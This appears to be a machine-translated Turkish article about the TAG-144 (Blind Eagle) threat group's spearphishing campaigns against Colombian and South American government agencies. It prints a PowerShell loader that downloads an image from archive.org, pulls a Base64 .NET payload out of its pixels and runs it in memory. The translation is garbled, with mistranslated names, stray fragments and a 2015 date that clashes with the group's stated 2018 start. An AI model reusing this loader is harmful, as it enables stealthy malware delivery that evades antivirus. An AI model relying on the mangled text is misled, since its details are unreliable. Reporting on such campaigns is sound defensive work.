Geçtiğimiz yıl boyunca, TAG-144 olarak bilinen gölgeli bir tehdit aktörü-ayrıca Blind Eagle ve APT-C-36 takma adları altında izlendi-Güney Amerika hükümet kurumlarına karşı yoğunlaştı.
İlk olarak 2018’de gözlemlenen bu grup, genellikle resmi yargı veya vergi bildirimleri olarak maskelenen yüksek hedefli spearfishing kampanyaları aracılığıyla teslim edilen Asyncrat, Remcos Rat ve Xworm gibi bir dizi emtia uzaktan erişim truva atlarını (sıçanlar) benimsedi.
2015’in ortalarında, kaydedilen gelecek analistler etkinlikte önemli bir artış kaydetti, beş farklı küme yeni altyapı konuşlandırdı ve kötü amaçlı yazılım yüklerini aşamalı olarak meşru internet hizmetlerinden yararlandı.
İlk erişim genellikle yerel yönetim ajanslarından tehlikeye atılan veya sahte e -posta hesaplarından yararlanır ve kullanıcıları kötü amaçlı belgeler veya SVG ekleri açmaya çeker.
Bu ekler genellikle yürütüldüğünde Paste.ee veya Discord’un CDN’si gibi hizmetlerden ikinci aşamalı bir yükleyiciyi alan gömülü JavaScript içerir.
Kaydedilen gelecekteki araştırmacılar, düşmanlık yasal çağrılar göndermek için kullanılan çok sayıda uzlaşmış Kolombiyalı hükümet e -posta adresini tespit ettiler ve düşmanın sosyal mühendisliği teknik alt fuge ile harmanlama yeteneğini gösterdi.
.webp)
TAG-144’ün kampanyalarının etkisi, Kolombiya’nın federal ve belediye kurumlarında en şiddetli olmuştur; burada kimlik bilgilerinin ve hassas verilerin hem casusluk hem de finansal gasp riskleri ortaya çıkarır.
Temel taktikleri kümeler arasında paylaşmasına rağmen-dıravma DNS alanları, açık kaynaklı sıçanlar ve çalınan krypters-grubun steganografi ve alan üretim algoritmaları (DGA’lar) gelişen kullanımı, daha esnek operasyonlara doğru kayda değer bir kaymayı işaret ediyor.
Kaydedilen gelecek analistler, bu evrimin sadece geleneksel savunmaları karmaşıklaştırdığını değil, aynı zamanda siber suç ve devlet düzeyindeki casusluk arasındaki bulanık çizgiyi de vurguladığını belirtti.
Enfeksiyon mekanizması ve steganografik yük çıkarımı
TAG-144’ün en sofistike tekniklerinden biri, arşivde barındırılan iyi huylu bir JPEG görüntüsünün piksel verilerine Base64 kodlu bir .NET montajının yerleştirilmesini içerir.[.]Org.
.webp)
İlk PowerShell komut dosyasının yürütülmesi üzerine yükleyici, yükü doğrudan bellekte çıkarmadan ve çağırmadan önce, disk yazılarını atlayarak ve antivirüs algılamasından kaçınmadan önce önceden tanımlanmış bir bayt işaretçisi tarar.
Örneğin, bu süreçten sorumlu bozulmuş PowerShell segmenti şu şekilde görünür:
$tormodont="https://archive.org/download/universe-.../universe.jpg"
$sclere = New-Object System.Net.WebClient
$sclere.Headers.Add('User-Agent','Mozilla/5.0')
$sorority = $sclere.DownloadData($tormodont)
# Identify marker and extract embedded bytes
$splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]
$stream = New-Object IO.MemoryStream
$stream.Write($splenoncus, 0, $splenoncus.Length)
$bitmap = [Drawing.Bitmap]::FromStream($stream)
# Reconstruct payload from pixel data
foreach ($y in 0..($bitmap.Height-1)) {
foreach ($x in 0..($bitmap.Width-1)) {
$color = $bitmap.GetPixel($x,$y)
$bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)
}
}
$payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join '')
[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)Bu bellek içi enjeksiyon, dinamik alan çözünürlüğü ile birleştiğinde-genellikle Duckdns.org ve noip.com gibi hizmetlerden yararlanmak-sıçanın komuta ve kontrol altyapısının çevik ve izlenmesi zor kalmasını sağlar.
Geleneksel yürütülebilir indirmelerden kaçınarak ve steganografi kullanarak TAG-144, hem tespit kaçırma hem de varlık evrelemesinin ileri bir anlayışını gösterir ve bölgedeki hükümet ağları için kalıcı bir tehdit oluşturur.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.